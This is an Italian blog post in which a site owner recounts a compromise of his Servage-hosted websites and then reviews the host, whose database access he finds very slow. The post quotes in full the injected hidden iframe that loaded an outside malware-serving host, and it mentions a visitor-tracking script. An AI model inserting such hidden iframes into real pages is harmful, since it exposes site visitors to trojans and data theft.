Praticamente, probabilmente sfruttando le debolezze dell’hosting oppure utilizzando le mie credenziali di accesso via FTP (cosa che mi sembra molto improbabile), è riuscito a modificare tutte le pagine index (sia html che php) di tutti i miei siti web inserendo il seguente iframe:

<iframe src=”http://thedeadpit.com/?click=xxxxxx” width=1 height=1 style=”visibility:hidden position:absolute”>

e un codice che ora ho cancellato che si collegava a google-stats.com e forniva (probabilmente) tutte le informazioni dei visitatori ai miei siti, ma che non ha nulla a che fare con google! Infatti se provate a collegarvi a quel sito si vieni subito dirottati a Google.it! Incredibile!

L’iframe invece chiudeva il browser e generava un messaggio di errore nel quale si consigliava di istallare un antivirus (pensa un po’ che bell’antivirus poteva essere) cliccando su OK. Mi hanno segnalato che Avast Antivirus lo segnalava come Trojan, ma per noi che utilizziamo linux non abbiamo questo problema! :-)

Morale: ho dovuto controllare e modificare i file index.php (anche quelli che finivano con index es. BoardIndex.php) di tutti i miei siti web, e modificare anche le credenziali di accesso! Non so dire con esattezza quale possa essere stata la causa di questo problema; il supporto del mio hosting servage mi risponde così:

Our servers are secured. Most of attackers use an upload script that allows visitors of the website to upload files. Please change your account password and check that no folders have insecure permissions such as 777 (unlimited access).

Però le cartelle dei siti web avevano i permessi 755, il che significa che solo il proprietario ha i permessi di scrittura, per questo ho supposto che l’hacker ha probabilmente sfruttato le debolezze del server o ha “sgamato” la mia user e pass dell’FTP… ma non ci credo a quest’ultima ipotesi ;-)

Che è uno degli hosting più convenienti in assoluto non c’è ombra di dubbio, e il fatto che i loro server risiedano in Germania è un punto a loro favore se per noi è importante un basso tempo di delay per la visualizzazioni dei nostri siti. Ultimamente però le connessioni ai database creati su Servage hanno un ritardo così esagerato che è davvero estenuante navigare sui siti da lui hostati! Per non parlare dei tempi interminabili che si aspettano per inserire un nuovo articolo con un CMS come WordPress! Capisco che è un’hosting molto apprezzato ma così le bestemmie volano!

Prendendo come esempio un sito sviluppato con WP appunto, ogni volta che si accede alla homepage il CMS effettua l’accesso al Database e con una serie di richieste visualizza i contenuti del sito stesso! Normale direte! Ma non diventa più normale quando per accedere al DB ci impiega, in molti casi, anche 20 secondi! Non è concepibile nè per noi sviluppatori nè per i visitatori stessi! Fortunatamente ho risolto il problema con un plugin per WP di nome Wp Super Cache! Ma se avessi messo a punto un bellissimo E-commerce come Magento su un hosting Servage? Quante bestemmie avremmo detto noi quando dovevamo inserire un nuovo prodotto e aspettare 30 secondi solo per l’accesso al DB? E quante ancora ne avrebbero dette i visitatori soprattutto al momento del pagamento?

Ebbene, molte cose ho capito di Servage Hosting, e sento il dovere di diffondere nel mio blog i pregi e i difetti.

Pregi di Servage:

• Economico: soltanto 80 euro l’anno (circa)
• Ricchissimo di funzionalità e pieno controllo del server come un VPS.
• Possibilità di attivare e disattivare funzioni del php.ini
• Mod Rewrite attivo (determinante per le attività SEO)
• Possibilità di hostare più di 25 domini
• Gestione DNS completa (puoi comprare i domini altrove e dirottarli li)
• Infinite caselle email ed ftp account
• 1000 Database disponibili per ogni account
• Più di 510 Gb di spazio e 5 Terabyte di traffico mensile consentito
• Possibilità di creare infiniti domini di terzo livello (http://sub.domain.com)
• Supporto tecninco attivo 24 ore su 24 (rispondono anche dopo 2 minuti)

Difetti di Servage:

• Database spesso troppo, troppo, troppo lento da accederci
• Alcune restrizioni lato server (che non riesco a spiegarvi in 2 righe)
• Impossibilità di istallarci un e-commerce causa eccessiva lentezza DB

Come vedete i pregi sono nettamente maggiori, ma per quanto mi riguarda il fatto che sia troppo lento ad acceddere ai DB ne moltiplica per 1000 i difetti! Lo consiglio a patto che non vogliate installarci un ecommerce e che il vostro CMS disponga di un plugin per creare una cache delle pagine in html; il che risolverebbe il problema dei ritardi di accesso al DB.